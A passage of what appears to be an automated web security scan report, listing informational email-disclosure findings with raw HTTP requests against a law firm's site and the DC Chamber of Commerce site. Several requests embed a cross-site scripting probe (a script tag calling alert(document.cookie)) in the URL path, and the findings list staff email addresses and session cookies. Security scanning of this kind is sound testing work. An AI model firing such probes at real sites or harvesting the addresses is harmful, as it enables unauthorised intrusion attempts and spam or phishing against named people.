<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Health Care Refor
...[SNIP]...
</div>sdanzis@cov.com<br />
...[SNIP]...
</div>rdearment@cov.com<br />
...[SNIP]...
</div>rkingham@cov.com<br />
...[SNIP]...
</div>dkouzoukas@cov.com<br />
...[SNIP]...
</div>akraus@cov.com<br />
...[SNIP]...
</div>elietzan@cov.com<br />
...[SNIP]...
</div>smacey@cov.com<br />
...[SNIP]...
</div>anmoore@cov.com<br />
...[SNIP]...

17.20. http://www.cov.com/industry/financial_services/dodd_frank/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /industry/financial_services/dodd_frank/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /industry/financial_services/dodd_frank/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Dodd-Frank Regula
...[SNIP]...
</div>sstock@cov.com<br />
...[SNIP]...
</div>bbennett@cov.com<br />
...[SNIP]...
</div>dengvall@cov.com<br />
...[SNIP]...

17.21. http://www.cov.com/ja-JP/practice/region.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /ja-JP/practice/region.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ja-JP/practice/region.aspx?service=9648 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=9ea607c8-9b1f-4d48-8f17-55bea1b70c47; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle"> | | ......</title>
<meta name="language" content="9ea607c8-9b1f-4d48-8f17-
...[SNIP]...
</div>jsnipes@cov.com


<br />
...[SNIP]...
</div>mplotkin@cov.com


<br />
...[SNIP]...

17.22. http://www.cov.com/ko-KR/practice/region.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /ko-KR/practice/region.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ko-KR/practice/region.aspx?service=9649 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=af203ebe-34a8-4674-98e1-76447e0b5d76; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">......... &amp; ...... ............ | | ......</title>
<meta name="language
...[SNIP]...
</div>jsnipes@cov.com


<br />
...[SNIP]...
</div>mplotkin@cov.com


<br />
...[SNIP]...

17.23. http://www.cov.com/zh-CN/practice/region.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /zh-CN/practice/region.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /zh-CN/practice/region.aspx?service=9647 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 19 Jan 2011 15:45:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.cov.com/zh-CN/offices/office.aspx?office=64
Set-Cookie: Language=8d3b6585-6a63-4372-bcac-71fa92156eab; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21150

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.cov.com/zh-CN/offices/office.aspx?office=64">here</a>.</h2>
</body></html>


<!DOCTYPE HTML PUBLIC "-/
...[SNIP]...
</div>eeliasoph@cov.com


<br />
...[SNIP]...
</div>mplotkin@cov.com


<br />
...[SNIP]...
</div>jsnipes@cov.com


<br />
...[SNIP]...

17.24. http://www.dcchamber.org/chamber/memberDetail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber/memberDetail.asp HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:47:49 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.25. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.26. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:27 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.27. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:17 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.28. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:27 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.29. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:25 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.30. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.31. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.32. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:21 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

17.33. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:16 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="mailto:info@dcchamber.org">
...[SNIP]...
<a href="mailto:info@dcchamber.org">info@dcchamber.org</a>
...[SNIP]...

